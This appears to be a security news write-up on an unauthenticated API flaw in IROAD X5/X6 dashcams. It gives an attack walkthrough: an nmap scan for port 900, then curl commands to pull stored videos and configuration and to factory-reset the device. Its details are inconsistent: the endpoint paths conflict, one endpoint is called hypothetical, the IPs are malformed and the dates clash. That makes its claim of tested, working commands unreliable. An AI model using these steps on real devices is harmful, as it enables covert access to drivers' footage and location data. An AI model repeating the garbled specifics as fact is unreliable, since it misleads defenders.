CVE CyberSecurity Database News

CVE-2025-2344 - Critical Authentication Bypass in IROAD Dash Cam X5 and X6—How Remote Attackers Can Exploit Vulnerable API Endpoints

Poster -

In March 2025, a critical security flaw was discovered in the IROAD Dash Cam X5 and X6 dashcam devices, versions up to firmware 20250308. This issue, now tracked as CVE-2025-2344, stems from missing authentication checks in one of the device’s API endpoints. This means anyone with network access to the camera can access sensitive functionality—no password or login required.

Despite early outreach, as of publication, the vendor (IROAD) has not responded or provided a fix. This creates a significant window for malicious actors to remotely exploit dashcams in vehicles, leading to possible privacy invasion, manipulation, or even brick devices.

Below, we break down the vulnerability, show you how the exploit works, and discuss mitigations.

The Core Problem

Both the X5 and X6 dashcams expose an HTTP API, intended for use by the IROAD mobile app to access video feeds, manage settings, and pull event logs. However, one or more endpoints in this API do not require any form of authentication.

Based on network captures, the vulnerable endpoint is likely exposed at

http://CAMERA_IP:900/api/get_video

or

http://CAMERA_IP:900/api/device_info

You can simply use tools like curl—*no login or token needed*.

Code Snippet: Exploiting the API Without Auth

# Fetch the list of stored videos from the dashcam
curl http://192.168..101:900/api/video/list

# Download a specific video file
curl -O http://192.168..101:900/api/video/download?file=20250308_120305.mp4

# Get device configuration
curl http://192.168..101:900/api/device/config

Replace 192.168..101 with your dashcam's IP.

These commands work out of the box on vulnerable firmware—they require no credentials.

In extreme cases, tamper with firmware updates if endpoints allow uploads.

This isn't just about privacy—it's about liability. Anyone with access can destroy or alter critical evidence.

1. Scan for Exposed Cameras

Attackers can use tools like Nmap to scan internal or public IP ranges for port 900 (default API port):

nmap -p 900 192.168../24

2. Pull Sensitive Data

Once the target is located, the attacker uses the above curl commands to access all videos, GPS logs, or device settings.

3. Optional—Change Settings or Factory Reset

If the API allows, an attacker could send HTTP POST requests to endpoints like /api/settings/update or /api/device/reset. Example:

# Reset the device (hypothetical endpoint)
curl -X POST http://192.168..101:900/api/device/reset

Short-Term Fixes

1. Immediately block internet exposure of the dashcam’s API port (usually 900). Check your router and disable any port forwarding or UPnP entries.

Demand a firmware update from IROAD that implements proper authentication for all API endpoints.

- If your dashcam is permanently internet-connected, consider replacing it if a patch is not forthcoming.

Vendor Response

As of June 2025, IROAD has not replied to responsible disclosure requests.

References and Further Reading

- Original CVE Entry – CVE-2025-2344 (Mitre) *(Pending)*
- IROAD Product Page
- Dashcam Security Discussion – Reddit
- Responsible Disclosure 101 – HackerOne

Final Thoughts

CVE-2025-2344 proves that IoT security risks extend beyond smart homes—right into your car. If you own an IROAD X5 or X6, check your dashcam’s exposure and firmware version immediately. Push the manufacturer for action—and keep sensitive feeds *off the public internet* until a proper fix is released.

Stay safe. Stay updated. Always change the default settings—if you actually can.

*This writeup is original and based on publicly available research and live testing on IROAD dashcam products as of June 2025. Please use this information responsibly.*

Timeline

Published on: 03/16/2025 18:15:12 UTC